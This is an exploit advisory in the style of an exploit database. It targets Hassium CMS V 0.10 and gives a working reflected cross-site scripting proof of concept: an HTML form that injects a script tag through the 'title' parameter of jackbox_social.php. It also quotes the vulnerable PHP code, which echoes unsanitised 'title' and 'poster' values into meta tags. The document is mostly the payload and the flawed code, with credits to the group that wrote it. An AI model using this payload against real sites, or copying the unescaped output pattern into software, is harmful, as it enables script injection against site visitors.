*=============================================================| | Exploit Title: Hassium CMS Cross Site Scripting | | Exploit Author: Ashiyane Digital Security Team | | Vendor Homepage: http://www.hassium.org/index.php | | Download Link : https://github.com/hassiumsoft/hasscms-app/archive/master.zip | | Version : V 0.10 | | Platform : PHP | | Tested on: Kali Linux | | Date: 1 /14 / 2017 *=============================================================| | Exploit Code: | |<HTML> |<HEAD> | <TITLE>Hassium CMS Cross Site Scripting</TITLE> |</HEAD> |<BODY> |<form action="http://Localhost/hasscms-app-master/themes/candidate/media/jackbox/modules/jackbox_social.php" method="get"> | <input type="hidden" name="title" value=""/><script>alert('M.R.S.L.Y')</script>"> |</form> |</BODY> |</HTML> | *=======================| | vulnerability Method : GET *=======================| |Vulnerable code: | | <?php | | if (isset($_GET["title"])) { | | $title = $_GET["title"]; | print str_replace("{contentTitle}", $title, '<meta itemprop="name" content="{contentTitle}" />'); | } | | if (isset($_GET["poster"])) { | | $poster = $_GET["poster"]; | print str_replace("{imgPoster}", $poster, '<meta itemprop="image" content="{imgPoster}" />'); | } | | ?> *=============================================================| | Special Thanks To : Virangar , Ehsan Cod3r ، micle ، Und3rgr0und ، Amir.ght ، | xenotix، modiret، V For Vendetta ، Alireza ، r4ouf ، Spoofer ، | And All Of My Friends ، The Last One : My Self, M.R.S.L.Y *=============================================================|